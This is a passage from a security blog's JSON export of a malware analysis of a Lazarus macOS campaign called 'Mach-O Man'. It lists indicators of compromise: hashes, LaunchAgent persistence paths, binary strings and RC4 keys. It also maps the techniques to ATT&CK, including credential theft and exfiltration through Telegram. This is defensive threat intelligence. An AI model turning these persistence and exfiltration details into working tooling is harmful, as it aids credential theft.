class=\"wp-block-list\">\n<li>dfee6ea9cafc674b93a8460b9e6beea7f0eb0c28e28d1190309347fd1514dbb6 (TeamsApp.zip)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3 (teamsSDK.bin)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9 (ZoomApp.zip)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Host-based IOCs&nbsp;<\/h3>\n\n\n\n<p><strong>Persistence Artifacts<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Library\/LaunchAgents\/com.onedrive.launcher.plist&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Library\/LaunchAgents\/com.onedrive.launcher.tmp&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Suspicious Directories \/ Files<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Library\/.initialized&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\/Users\/$USER\/.local\/bin\/OneDrive&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>$TMPDIR\/geniex_client_sleep_state&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Code \/ Binary Artifacts&nbsp;<\/h3>\n\n\n\n<p><strong>Strings<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>geniex-client\/core&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>geniex-client\/protocol&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>geniex-client\/Internal\/vss&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>geniex_client_sleep_state&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>geniex&nbsp;config file too short&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>com.onedrive.launcher&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Die command received,&nbsp;initiating&nbsp;self-destruction&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>hobocopy_%d&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Build Artifact<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>GoBuildID:&nbsp;<br>XSnX8a5Y1OweX0Ob6lfO\/ZYlrxu-H_BNvt5ptXb3c\/8HR_X2LwoFzXXN4Fti_K\/xaM13na_g6snvgcy0x9t&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Encryption Keys<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>RC4Key:&nbsp;<br>a73ce18952b40fd621789e43c56b2af08d1497ce3560b2481fa973d8265ce491&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>RC4Key:&nbsp;<br>5476bbf8ddb2fb056295f09ebe05e20a7d1cf29ea279cd4613c87544013e080fef35c97b3511ef9c0f12e505a1d805628ba10483dc9290508f94d153ee94d5c4&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">ATT&amp;CK Matrix&nbsp;<\/h3>\n\n\n\n<p><strong>Execution&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>User Execution (T1204)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Persistence&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Create or Modify System Process: Launch Agent (T1543.001)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Privilege Escalation&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Abuse Elevation Control Mechanism: Sudo and Sudo Caching (T1548.003)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Defense Evasion&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>File and Directory Permissions Modification (T1222)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Virtualization\/Sandbox Evasion (T1497)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Credential Access<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Credentials from Password Stores (T1555)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Unsecured Credentials (T1552)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Discovery &amp; Collection&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>System Information Discovery (T1082)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Process Discovery (T1057)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>System Time Discovery (T1124)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>File and Directory Discovery (T1083)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Data from Local System (T1005)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Archive Collected Data (T1560)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Exfiltration&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Exfiltration Over Web Service: Exfiltration to Cloud Storage \/ Web Service (T1567)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Data is exfiltrated via Telegram bot API, using a legitimate web service to evade detection.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">References&nbsp;<\/h3>\n\n\n\n<p>Original Quetzal Team Article:&nbsp;<a href=\"https:\/\/open.substack.com\/pub\/quetzalteam\/p\/north-koreas-safari-hunting-for-rats\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/open.substack.com\/pub\/quetzalteam\/p\/north-koreas-safari-hunting-for-rats<\/a>&nbsp;&nbsp;<\/p>\n\n\n\n<p>Original&nbsp;LevelBlue&nbsp;Labs Intelligence Pulse:&nbsp;https:\/\/otx.alienvault.com\/pulse\/69d9c62d24ae9bc8d5653f56&nbsp;&nbsp;<\/p>\n\n\n\n<p>Session 1:&nbsp;<a href=\"https:\/\/app.any.run\/tasks\/937afde2-5e3c-4eb0-a7d1-6124f0f3ed18\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/937afde2-5e3c-4eb0-a7d1-6124f0f3ed18<\/a>&nbsp;<\/p>\n\n\n\n<p>Session 2:&nbsp;<a href=\"https:\/\/app.any.run\/tasks\/777b23e8-25ea-45b5-a998-d2e1c400c9d1\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/777b23e8-25ea-45b5-a998-d2e1c400c9d1<\/a>&nbsp;<\/p>\n\n\n\n<p>Session 3:&nbsp;<a href=\"https:\/\/app.any.run\/tasks\/7f771a62-fcda-4a33-8e99-ab068fae8500\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/7f771a62-fcda-4a33-8e99-ab068fae8500<\/a>&nbsp;<\/p>\n\n\n\n<p>Session 4: <a href=\"https:\/\/app.any.run\/tasks\/94b9bc1f-86ff-4069-8222-1cb511d78ad9\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/94b9bc1f-86ff-4069-8222-1cb511d78ad9<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Editor\u2019s note:&nbsp;The research is authored by Mauro Eldritch, offensive security expert and a founder of BCA LTD, a company dedicated to threat intelligence and hunting. You can&nbsp;find Mauro on X.&nbsp; The recent wave of&nbsp;ClickFix attacks&nbsp;has introduced several new ways to compromise users,&nbsp;establishing&nbsp;itself as a technique that is likely here to stay. We have&nbsp;observed&nbsp;Lazarus Group using [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":20237,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,10,34,40],"class_list":["post-20176","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-cybersecurity","tag-malware-analysis","tag-malware-behavior"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Lazarus \u201cMach-O Man\u201d Malware: What CISOs Need to Know<\/title>\n<meta name=\"description\" content=\"Learn how the Lazarus \u201cMach-O Man\u201d campaign targets businesses, and how SOC leaders can reduce credential theft and data exposure risk.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Mauro Eldritch\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"16 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/\"},\"author\":{\"name\":\"Mauro Eldritch\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"New Lazarus APT Campaign: \u201cMach-O Man\u201d macOS Malware\u00a0Kit Hits Businesses\",\"datePublished\":\"2026-04-21T08:49:42+00:00\",\"dateModified\":\"2026-04-21T11:02:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/\"},\"wordCount\":3645,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"cybersecurity\",\"malware analysis\",\"malware behavior\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/\",\"name\":\"Lazarus \u201cMach-O Man\u201d Malware: What CISOs Need to Know\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2026-04-21T08:49:42+00:00\",\"dateModified\":\"2026-04-21T11:02:52+00:00\",\"description\":\"Learn how the Lazarus \u201cMach-O Man\u201d campaign targets businesses, and how SOC leaders can reduce credential theft and data exposure risk.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"New Lazarus APT Campaign: \u201cMach-O Man\u201d macOS Malware\u00a0Kit Hits Businesses\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"Mauro Eldritch\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg\",\"caption\":\"Mauro Eldritch\"},\"description\":\"Mauro Eldritch is an Argentinian-Uruguayan hacker, founder of BCA LTD and DC5411 (Argentina \/ Uruguay). He has spoken at various events, including DEF CON (12 times). He is passionate about Threat Intelligence and Biohacking.\u00a0He currently leads Bitso\u2019s Quetzal Team, the first in Latin America dedicated to Web3 Threat Research. Follow Mauro on: X LinkedIn GitHub\",\"url\":\"#molongui-disabled-link\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Lazarus \u201cMach-O Man\u201d Malware: What CISOs Need to Know","description":"Learn how the Lazarus \u201cMach-O Man\u201d campaign targets businesses, and how SOC leaders can reduce credential theft and data exposure risk.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/","twitter_misc":{"Written by":"Mauro Eldritch","Est. reading time":"16 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/"},"author":{"name":"Mauro Eldritch","@id":"https:\/\/any.run\/"},"headline":"New Lazarus APT Campaign: \u201cMach-O Man\u201d macOS Malware\u00a0Kit Hits Businesses","datePublished":"2026-04-21T08:49:42+00:00","dateModified":"2026-04-21T11:02:52+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/"},"wordCount":3645,"commentCount":0,"publisher":{"@id":"https:\/\/any.run\/"},"keywords":["ANYRUN","cybersecurity","malware analysis","malware behavior"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/","url":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/","name":"Lazarus \u201cMach-O Man\u201d Malware: What CISOs Need to Know","isPartOf":{"@id":"https:\/\/any.run\/"},"datePublished":"2026-04-21T08:49:42+00:00","dateModified":"2026-04-21T11:02:52+00:00","description":"Learn how the Lazarus \u201cMach-O Man\u201d campaign targets businesses, and how SOC leaders can reduce credential theft and data exposure risk.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"New Lazarus APT Campaign: \u201cMach-O Man\u201d macOS Malware\u00a0Kit Hits Businesses"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/twitter.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},{"@type":"Person","@id":"https:\/\/any.run\/","name":"Mauro Eldritch","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg","caption":"Mauro Eldritch"},"description":"Mauro Eldritch is an Argentinian-Uruguayan hacker, founder of BCA LTD and DC5411 (Argentina \/ Uruguay). He has spoken at various events, including DEF CON (12 times). He is passionate about Threat Intelligence and Biohacking.\u00a0He currently leads Bitso\u2019s Quetzal Team, the first in Latin America dedicated to Web3 Threat Research. Follow Mauro on: X LinkedIn GitHub","url":"#molongui-disabled-link"}]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/20176"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=20176"}],"version-history":[{"count":45,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/20176\/revisions"}],"predecessor-version":[{"id":20270,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/20176\/revisions\/20270"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/20237"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=20176"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=20176"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=20176"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}